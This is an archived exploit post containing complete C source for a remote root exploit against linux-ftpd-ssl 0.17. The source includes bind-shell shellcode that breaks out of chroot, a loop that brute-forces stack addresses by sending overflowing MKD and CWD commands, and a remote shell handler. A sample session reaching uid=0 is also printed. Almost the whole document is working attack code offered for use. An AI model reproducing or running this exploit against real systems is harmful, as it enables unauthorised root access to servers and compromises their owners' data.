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lnxFTPDssl_warez.c

lnxFTPDssl_warez.c
Posted Nov 8, 2005
Authored by Kingcope

linux-ftpd-ssl version 0.17 remote root exploit.

tags | exploit, remote, root
systems | linux
SHA-256 | be5cea73ef109d7b131805238e4fdeaedde07aca071a5fe50ad0772a3753c056

lnxFTPDssl_warez.c

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/*Oct2005 VER2*/
/**********************************************************/
/** lnxFTPDssl_warez.c **/
/** linux-ftpd-ssl 0.17 remote r00t exploit by kcope **/
/** for all of those who installed the ssl ready version **/
/** of linux-ftpd to be more "secure" **/
/** **/
/** be aware of the buffer overflows, **/
/** the code is strong cryto **/
/**********************************************************/
/** thanx blackzero,revoguard,wY!,net_spy **/
/** Confidential. Keep Private! **/
/**********************************************************/
/**
C:\Dokumente und Einstellungen\Administrator\Desktop>telnet 192.168.2.9 21
220 localhost.localdomain FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready.
AUTH SSL
234 AUTH SSL OK.
;PpPpPPpPPPpPPPPpPppPPPPPpPpPPPpPPpPpPPpPPPpPPPPpPppPPPPPpPpPPPpP
C:\Dokumente und Einstellungen\Administrator\Desktop>lnxFTPDssl_warez.exe 192.168.2.9 kcope password
lnxFTPDssl_warez.c
linux-ftpd-ssl 0.17 remote r00t exploit by kcope

connecting to 192.168.2.9:21... ok.
OK - STARTING ATTACK
+++ USING STACK ADDRESS 0xbfffcc03 +++
+++ USING STACK ADDRESS 0xbfffcc13 +++
+++ USING STACK ADDRESS 0xbfffcc23 +++
+++ USING STACK ADDRESS 0xbfffcc33 +++
+++ USING STACK ADDRESS 0xbfffcc43 +++
+++ USING STACK ADDRESS 0xbfffcc53 +++
+++ USING STACK ADDRESS 0xbfffcc63 +++
+++ USING STACK ADDRESS 0xbfffcc73 +++
+++ USING STACK ADDRESS 0xbfffcc83 +++
+++ USING STACK ADDRESS 0xbfffcc93 +++
+++ USING STACK ADDRESS 0xbfffcca3 +++
+++ USING STACK ADDRESS 0xbfffccb3 +++
+++ USING STACK ADDRESS 0xbfffccc3 +++
+++ USING STACK ADDRESS 0xbfffccd3 +++
+++ USING STACK ADDRESS 0xbfffcce3 +++
+++ USING STACK ADDRESS 0xbfffccf3 +++
+++ USING STACK ADDRESS 0xbfffcd03 +++
+++ USING STACK ADDRESS 0xbfffcd13 +++
+++ USING STACK ADDRESS 0xbfffcd23 +++
+++ USING STACK ADDRESS 0xbfffcd33 +++
+++ USING STACK ADDRESS 0xbfffcd43 +++
+++ USING STACK ADDRESS 0xbfffcd53 +++
+++ USING STACK ADDRESS 0xbfffcd63 +++
+++ USING STACK ADDRESS 0xbfffcd73 +++
+++ USING STACK ADDRESS 0xbfffcd83 +++
+++ USING STACK ADDRESS 0xbfffcd93 +++
+++ USING STACK ADDRESS 0xbfffcda3 +++
+++ USING STACK ADDRESS 0xbfffcdb3 +++
+++ USING STACK ADDRESS 0xbfffcdc3 +++
+++ USING STACK ADDRESS 0xbfffcdd3 +++
+++ USING STACK ADDRESS 0xbfffcde3 +++
+++ USING STACK ADDRESS 0xbfffcdf3 +++
+++ USING STACK ADDRESS 0xbfffce03 +++
+++ USING STACK ADDRESS 0xbfffce13 +++
+++ USING STACK ADDRESS 0xbfffce23 +++
+++ USING STACK ADDRESS 0xbfffce33 +++
+++ USING STACK ADDRESS 0xbfffce43 +++
+++ USING STACK ADDRESS 0xbfffce53 +++
+++ USING STACK ADDRESS 0xbfffce63 +++
+++ USING STACK ADDRESS 0xbfffce73 +++
+++ USING STACK ADDRESS 0xbfffce83 +++
+++ USING STACK ADDRESS 0xbfffce93 +++
+++ USING STACK ADDRESS 0xbfffcea3 +++
+++ USING STACK ADDRESS 0xbfffceb3 +++
+++ USING STACK ADDRESS 0xbfffcec3 +++

Let's get ready to rumble!
id
uid=0(root) gid=0(root) egid=1000(kcope) groups=1000(kcope),20(dialout),24(cdrom
),25(floppy),29(audio),44(video),46(plugdev)
uname -a
Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux

**/
// Tested on Linux 2.4.18-14 Redhat 8.0
// Linux 2.2.20-idepci Debian GNU 3.0
// Linux 2.4.27-2-386 Debian GNU 3.1
// CHECK VER3 FOR MORE SUPPORT!!!
// ***KEEP IT ULTRA PRIV8***

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define BUF_SIZ 4096
#define PORT 21
#define BINDPORT 30464
#define STACK_START 0xbfffcc03
#define STACK_END 0xbffff4f0

/*my shellcode*/
/*setreuid,chroot break,
bind to port 30464, 0xff is double*/
unsigned char lnx_bind[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x70\x31\xC0\x31\xDB\x31\xC9"
"\xB0\x46\xCD\x80\x5E\x90\xB8\xBE"
"\xff\xff\xff\xff\xff\xff\xF7\xD0"
"\x89\x06\xB0\x27\x8D\x1E\xFE\xC5"
"\xB1\xED\xCD\x80\x31\xC0\x8D\x1E"
"\xB0\x3D\xCD\x80\x66\xB9\xff\xff"
"\x03\xBB\xD2\xD1\xD0\xff\xff\xF7"
"\xDB\x89\x1E\x8D\x1E\xB0\x0C\xCD"
"\x80\xE2\xEF\xB8\xD1\xff\xff\xff"
"\xff\xff\xff\xF7\xD0\x89\x06\xB0"
"\x3D\x8D\x1E\xCD\x80\x31\xC0\x31"
"\xDB\x89\xF1\xB0\x02\x89\x06\xB0"
"\x01\x89\x46\x04\xB0\x06\x89\x46"
"\x08\xB0\x66\x43\xCD\x80\x89\xF1"
"\x89\x06\xB0\x02\x66\x89\x46\x0C"
"\xEB\x04\xEB\x74\xEB\x77\xB0\x77"
"\x66\x89\x46\x0E\x8D\x46\x0C\x89"
"\x46\x04\x31\xC0\x89\x46\x10\xB0"
"\x10\x89\x46\x08\xB0\x66\x43\xCD"
"\x80\xB0\x01\x89\x46\x04\xB0\x66"
"\xB3\x04\xCD\x80\x31\xC0\x89\x46"
"\x04\x89\x46\x08\xB0\x66\xB3\x05"
"\xCD\x80\x88\xC3\xB0\x3F\x31\xC9"
"\xCD\x80\xB0\x3F\xB1\x01\xCD\x80"
"\xB0\x3F\xB1\x02\xCD\x80\xB8\xD0"
"\x9D\x96\x91\xF7\xD0\x89\x06\xB8"
"\xD0\x8C\x97\xD0\xF7\xD0\x89\x46"
"\x04\x31\xC0\x88\x46\x07\x89\x76"
"\x08\x89\x46\x0C\xB0\x0B\x89\xF3"
"\x8D\x4E\x08\x8D\x56\x0C\xCD\x80"
"\xE8\x15\xff\xff\xff\xff\xff\xff";

long ficken() {
printf("lnxFTPDssl_warez.c\nlinux-ftpd-ssl 0.17 remote r00t exploit by kcope\n\n");
return 0xc0debabe;
}

void usage(char **argv) {
printf("Insufficient parameters given.\n");
printf("Usage: %s <remotehost> <user> <pass> [writeable directory]\n", argv[0]);
exit(0);
}

void _recv(int sock, char *buf) {
int bytes=recv(sock, buf, BUFSIZ, 0);
if (bytes < 0) {
perror("read() failed");
exit(1);
}
}

void attack(int sock, unsigned long ret, char *pad) {
int i,k;
char *x=(char*)malloc(1024);
char *bufm=(char*)malloc(1024);
char *bufc=(char*)malloc(1024);
char *rbuf=(char*)malloc(BUFSIZ+10);
char *nops=(char*)malloc(1024);
unsigned char a,b,c,d;

memset(nops,0,1024);
memset(nops,0x90,255);
memset(x,0,1024);
for (i=0,k=0;i<60;i++) {
a=(ret >> 24) & 0xff;
b=(ret >> 16) & 0xff;
c=(ret >> 8) & 0xff;
d=(ret) & 0xff;

if (d==255) {
x[k]=d;
x[++k]=255;
} else {
x[k]=d;
}

if (c==255) {
x[k+1]=c;
x[++k+1]=255;
} else {
x[k+1]=c;
}

if (b==255) {
x[k+2]=b;
x[++k+2]=255;
} else {
x[k+2]=b;
}

if (a==255) {
x[k+3]=a;
x[++k+3]=255;
} else {
x[k+3]=a;
}

k+=4;
}

snprintf(bufm, 1000, "MKD %s%s\r\n", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1
snprintf(bufc, 1000, "CWD %s%s\r\n", pad, x);
for (i=0; i<11; i++) {
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}

for (i=0; i<2; i++) {
snprintf(bufm, 1000, "MKD %s\r\n", lnx_bind);
snprintf(bufc, 1000, "CWD %s\r\n", lnx_bind);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);

snprintf(bufm, 1000, "MKD %s\r\n", nops);
snprintf(bufc, 1000, "CWD %s\r\n", nops);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}

send(sock, "XPWD\r\n", strlen("XPWD\r\n"), 0);

free(bufm);
free(bufc);
free(x);
free(rbuf);
}

int do_remote_shell(int sockfd)
{
while(1)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sockfd,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
{
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds))
{
if((cnt=read(0,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(sockfd,buf,cnt);
}
if(FD_ISSET(sockfd,&fds))
{
if((cnt=read(sockfd,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(1,buf,cnt);
}
}
}
}

int do_connect (char *remotehost, int port) {
struct hostent *host;
struct sockaddr_in addr;
int s;

if (!inet_aton(remotehost, &addr.sin_addr))
{
host = gethostbyname(remotehost);
if (!host)
{
perror("gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}

s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return -1;
}

addr.sin_port = htons(port);
addr.sin_family = AF_INET;

if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
if (port == PORT) perror("connect() failed");
return -1;
}

return s;
}

void do_login(int s, char *buf, char *sendbuf, char *user, char *pass) {
memset(buf, 0, sizeof(buf));
memset(sendbuf, 0, sizeof(sendbuf));
do {
_recv(s, buf);
} while (strstr(buf, "220 ") == NULL);
snprintf(sendbuf, BUFSIZ, "USER %s\r\n", user);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "331 ") == NULL);

snprintf(sendbuf, BUFSIZ, "PASS %s\r\n", pass);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "230 ") == NULL);
}

int main(int argc, char **argv) {
char remotehost[255];
char user[255];
char pass[255];
char pad[10];
char *buf,*sendbuf;
int stackaddr=STACK_START;
int s,sr00t,i;

ficken();
if (argc < 4)
usage(argv);

strncpy(remotehost, argv[1], sizeof(remotehost));
remotehost[sizeof(remotehost)-1]=0;
strncpy(user, argv[2], sizeof(user));
user[sizeof(user)-1]=0;
strncpy(pass, argv[3], sizeof(pass));
pass[sizeof(pass)-1]=0;

printf("connecting to %s:%d...", remotehost, PORT);
fflush(stdout);

s=do_connect(remotehost, PORT);

puts(" ok.");
buf=(char*)malloc(BUFSIZ+10);
sendbuf=(char*)malloc(BUFSIZ+10);
do_login(s, buf, sendbuf, user, pass);

if (strstr(buf, "230")!=NULL) {
printf("OK - STARTING ATTACK\n");
i=0;
while (stackaddr <= STACK_END) {
printf("+++ USING STACK ADDRESS 0x%.08x +++\n", stackaddr);

sleep(1);

if (i==1) {
strcpy(pad, "A");
}

if (i==2) {
strcpy(pad, "AA");
}

if (i==3) {
strcpy(pad, "AAA");
i=0;
}

attack(s, stackaddr, pad);
close(s);
s=do_connect(remotehost, PORT);
do_login(s, buf, sendbuf, user, pass);

if (argv[4] != NULL) {
snprintf(sendbuf, BUFSIZ, "CWD %s\r\n", argv[4]);
send(s, sendbuf, strlen(sendbuf), 0);
recv(s, buf, BUFSIZ, 0);
}

if((sr00t=do_connect(remotehost, BINDPORT)) > 0) {
/* XXX Remote r00t */
printf("\nLet's get ready to rumble!\n");
do_remote_shell(sr00t);
exit(0);
}

stackaddr+=16;
i++;
}
} else {
printf("\nLogin incorrect\n");
exit(1);
}

free(buf);
free(sendbuf);
return 0;
}
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